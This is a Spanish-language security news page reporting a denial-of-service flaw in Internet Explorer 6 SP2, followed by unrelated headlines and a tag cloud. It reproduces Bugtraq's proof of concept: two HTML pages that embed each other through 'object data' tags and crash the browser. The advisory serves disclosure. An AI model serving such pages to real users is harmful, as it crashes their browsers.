DoS en Internet Explorer producido por "Object Data"


Se ha reportado que Microsoft Internet Explorer es afectado por una vulnerabilidad del tipo denegación de servicio (DoS). La vulnerabilidad se presenta cuando el navegador maneja páginas Web embebidas utilizando la etiqueta HTML "Object Data".





El fallo afecta a Microsoft Internet Explorer 6 SP2, con todas
las actualizaciones a la fecha de este aviso.

Bugtraq ha publicado la siguiente prueba de concepto:

Página #1 (grabar como "btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Página #2 (grabar como "btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>


* Software vulnerable:

- Microsoft Internet Explorer 6.0 SP2 (y posiblemente
anteriores)


* Soluciones:

Actualmente no existen parches para este problema.


* Créditos:

Benjamin Tobias Franz <0-1-2-3@gmx.de>


* Referencias:

- Identificado en BugTraq como ID 13800

Microsoft Internet Explorer Object Embedding Denial of Service Vulnerability
http://www.securityfocus.com/bid/13800/

- Referencia en FrSIRT: FrSIRT/ADV-2005-0646

Microsoft Internet Explorer Denial of Service Vulnerabilities
http://www.frsirt.com/english/advisories/2005/0646


Fuente:
Por Angela Ruiz
vsantivirus.com



Otras noticias de interés:

Llegó Super OS 10.04
Basado en Ubuntu y conocido como Super Ubuntu, no es más que Ubuntu 10.04 Lucid Lynx tonificado y fortificado. Super Ubuntu, tuvo que cambiar su nombre a Super OS por problemas de licencias. ...
Múltiples vulnerabilidades en el cliente ICQ
Según se informa en un aviso de seguridad de Core Security en http://www.coresecurity.com/common/showdoc.php?idx=315&idxseccion=10, se han detectado seis nuevas vulnerabilidades en el cliente de mensajería instantánea Mirabilis ICQ....
Facebook vuelve activar cookie de rastreo
Todo apunta a que la red social ha vuelto a habilitar una cookie que rastreaba la navegación del usuario. ...
¿Tenemos protección legal contra #ciberdelitos?
El cibercrimen perpetró estos últimos meses variados impactos en muchos países del mundo al lograr hackear y tumbar numerosos sitios webs de presidencias y ministerios estatales, fuerzas y departamentos de seguridad federales, medios de comunicaci...
Peligros de sistemas de reconocimiento facial
Investigadores de los EEUU llevaron a cabo tres experimentos para demostrar cómo dos herramientas aparentemente inofensivas, un celular y la base de datos de redes sociales, puede suponer un peligro para la privacidad. Alessandro Acquisti, Ralph Gro...
Envío de spam: tecnologías modernas
Los spammers usan programas y tecnologías especiales para generar y transmitir los millones de mensajes de spam que son enviados cada día. Esto requiere significantes inversiones de tiempo y dinero....
Curso de programación PHP Nivel 1 en Caracas - Venezuela
El próximo 07 y 08 DE MARZO 2009, la Gente de PHP de Venezuela organiza un curso Nivel I (para principiantes)....
Un fallo SSL podría haberse utilizado para atacar a Twitter
Otras páginas Web también podrían estar en peligro. Y es que, un fallo en el protocolo utilizado para asegurar las comunicaciones en Internet podría haberse utilizado para atacar cuentas Twitter. Es lo que afirman investigadores de seguridad de I...
Ejecución de código script arbitrario con RealOne
Se ha anunciado una vulnerabilidad en el manejo de archivos SMIL del reproductor RealOne. Si bien requiere engañar al usuario para que reproduzca dichos archivos, este problema puede llevar a la ejecución de código arbitrario en la máquina de la ...
Múltiples Vulnerabilidades en OpenSSL
El certificado de cliente OpenSSL posee vulnerabilidades múltiples que permiten posiblemente que alguien malicioso cause una negación del servicio (DoS) o tenga el acceso del sistema. El impacto de esta falla se cataloga de altamente crítico. ...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • data
  • debian
  • dos
  • exploits
  • explorer
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • object
  • opensource
  • pgp
  • php
  • producido
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra